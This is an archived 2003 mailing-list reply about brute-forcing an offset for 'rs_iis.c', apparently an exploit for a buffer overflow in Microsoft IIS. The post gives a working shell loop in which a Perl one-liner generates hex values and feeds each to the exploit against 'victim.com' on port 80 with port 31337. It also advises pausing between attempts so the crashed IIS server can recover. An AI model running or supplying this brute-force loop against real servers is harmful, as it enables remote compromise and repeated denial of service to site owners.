|
|||||||||||
|
Re: Generating Hex Numbers to brute force rs_iis.c
From: Joe Stewart <jstewart(at)lurhq.com>
Date: Tue Apr 01 2003 - 15:32:57 EST
On Monday 31 March 2003 10:14 am, Jeremy Junginger wrote:
How about just running it from your shell like: for i in `perl -e 'for (0..255) { printf "0x%02x%02x\n", $_, $_ }'`; do \ ./rs_iis victim.com 80 31337 $i; done Remember that IIS will need time to recover from the crash caused by the overflow, so you may need to sleep for some period of time between tries. -Joe -- Joe Stewart, GCIH Senior Intrusion Analyst LURHQ Corporation http://www.lurhq.com/Received on Thu Apr 3 12:44:09 2003 This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:38 EDT |
||||||||||
|
|||||||||||